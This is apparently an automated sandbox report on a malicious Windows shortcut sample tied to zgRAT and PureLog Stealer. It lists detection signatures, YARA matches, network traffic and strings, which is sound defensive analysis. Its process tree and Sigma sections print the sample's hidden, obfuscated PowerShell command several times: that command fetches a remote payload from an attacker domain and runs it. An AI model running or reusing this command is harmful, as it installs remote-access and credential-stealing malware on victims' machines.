Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jKSjtQ8W7O.lnk

Overview

General Information

Sample name:jKSjtQ8W7O.lnk
renamed because original name is a hash value
Original sample name:ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3.lnk
Analysis ID:1522859
MD5:154af2b280309c99ae116841e1db5474
SHA1:db66323cd296d1571b8c1816c2fbefb474112e5e
SHA256:ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3
Tags:lnkSideWinderuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Performs DNS queries to domains with low reputation
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses nslookup.exe to query domains
Uses ping.exe to check the status of other devices and networks
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PING.EXE (PID: 3040 cmdline: "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk MD5: 2F46799D79D22AC72C241EC0322B011D)
    • nslookup.exe (PID: 3800 cmdline: "C:\Windows\system32\nslookup.exe" www.Elpson.com MD5: F2E3950C1023ACF80765C918791999C0)
    • nslookup.exe (PID: 4136 cmdline: "C:\Windows\system32\nslookup.exe" www.mproton.com MD5: F2E3950C1023ACF80765C918791999C0)
    • chrome.exe (PID: 3160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 2644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • powershell.exe (PID: 7656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x7acec:$s1: file:///
      • 0x7abd8:$s2: {11111-22222-10009-11112}
      • 0x7ac7c:$s3: {11111-22222-50001-00000}
      • 0x73bb5:$s4: get_Module
      • 0x74022:$s5: Reverse
      • 0x7a1b1:$s6: BlockCopy
      • 0x7a32e:$s7: ReadByte
      • 0x7acfe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Process Memory Space: powershell.exe PID: 6588INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x2604:$b2: ::FromBase64String(
        • 0x2ce1:$b2: ::FromBase64String(
        • 0xb26a5:$b2: ::FromBase64String(
        • 0xb27a6:$b2: ::FromBase64String(
        • 0xc98ce:$b2: ::FromBase64String(
        • 0xca629:$b2: ::FromBase64String(
        • 0x12952d:$b2: ::FromBase64String(
        • 0x129629:$b2: ::FromBase64String(
        • 0x2891ce:$b2: ::FromBase64String(
        • 0x289331:$b2: ::FromBase64String(
        • 0x151cc:$s1: -join
        • 0x222a1:$s1: -join
        • 0x25673:$s1: -join
        • 0x25d25:$s1: -join
        • 0x27816:$s1: -join
        • 0x29a1c:$s1: -join
        • 0x2a243:$s1: -join
        • 0x2aab3:$s1: -join
        • 0x2b1ee:$s1: -join
        • 0x2b220:$s1: -join
        • 0x2b268:$s1: -join
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        10.2.powershell.exe.1985268eeb0.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          10.2.powershell.exe.1985268eeb0.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            10.2.powershell.exe.1985268eeb0.4.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
            • 0x78eec:$s1: file:///
            • 0x78dd8:$s2: {11111-22222-10009-11112}
            • 0x78e7c:$s3: {11111-22222-50001-00000}
            • 0x71db5:$s4: get_Module
            • 0x72222:$s5: Reverse
            • 0x783b1:$s6: BlockCopy
            • 0x7852e:$s7: ReadByte
            • 0x78efe:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
            10.2.powershell.exe.1985ae70000.6.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              10.2.powershell.exe.1985ae70000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 7 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, ProcessId: 6588, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell, ProcessId: 6588, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 764, ProcessName: svchost.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: jKSjtQ8W7O.lnkReversingLabs: Detection: 36%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Source: jKSjtQ8W7O.lnkJoe Sandbox ML: detected
                Source: https://pmo.gov.pk/site/404HTTP Parser: No favicon
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49728 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 203.101.184.118:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.8:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49732 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\System.pdb( source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: klib.pdbx source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Adobe.pdb source: powershell.exe, 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .pdb,4@v source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000A.00000002.1692468917.000001985A9BF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ,.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842427000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.pdb4 source: powershell.exe, 0000000A.00000002.1693221030.000001985AA88000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000A.00000002.1660114048.0000019842360000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Source: DNS query: ministryofficedownloadcloudserver.screenpont.xyz
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk
                Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: i9F8JFEBNmpiWmUy3hupXw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                Source: Joe Sandbox ViewIP Address: 162.159.135.234 162.159.135.234
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CYBERNET-APCyberInternetServicesPvtLtdPK CYBERNET-APCyberInternetServicesPvtLtdPK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownHTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49728 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.18
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.18
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.18
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.18
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.18
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET //78/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /78/CKP/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /?v=9&encording=json HTTP/1.1Connection: Upgrade,Keep-AliveUpgrade: websocketSec-WebSocket-Key: i9F8JFEBNmpiWmUy3hupXw==Sec-WebSocket-Version: 13Host: gateway.discord.gg
                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=17PBEYOcBeLvKsF&MD=KVfEnAfS HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET //78/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /78/CKP/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ministryofficedownloadcloudserver.screenpont.xyzConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: www.ministryof.gov.pk
                Source: global trafficDNS traffic detected: DNS query: 1.1.1.1.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.Elpson.com
                Source: global trafficDNS traffic detected: DNS query: www.mproton.com
                Source: global trafficDNS traffic detected: DNS query: ministryofficedownloadcloudserver.screenpont.xyz
                Source: global trafficDNS traffic detected: DNS query: pmo.gov.pk
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: gateway.discord.gg
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:58:32 GMTContent-Length: 0Connection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Adw%2Bq4xBey8KrRUkdZwumMc4C%2Fr%2FjYjlCM8dj92YIgwxoCDjQ0vx5ywEB7jDbdrX8w5%2BIaW21p%2FAQmWWs%2BPnQH%2BCAKsTowQvIkNItjzagRsLnjJzSNXIeNNuvISMrvCoTSLu3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8cb5c2226fac0f41-EWR
                Source: powershell.exe, 00000000.00000002.4013626129.0000028DAD51F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftf
                Source: svchost.exe, 00000008.00000002.3952244849.000001B07849E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.2155944682.000001B078212000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
                Source: svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80
                Source: svchost.exe, 00000008.00000002.3951620956.000001B07842C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
                Source: svchost.exe, 00000008.00000002.3952244849.000001B078460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80IO:ID:
                Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gateway.discord.gg
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D953F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ministryofficedownloadcloudserver.scre
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmp, jKSjtQ8W7O.lnkString found in binary or memory: http://ministryofficedownloadcloudserver.scre$did/78/
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ministryofficedownloadcloudserver.scree
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz//78/
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz//78/the
                Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp, ConDrv.10.drString found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                Source: powershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3950139560.0000028D96C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
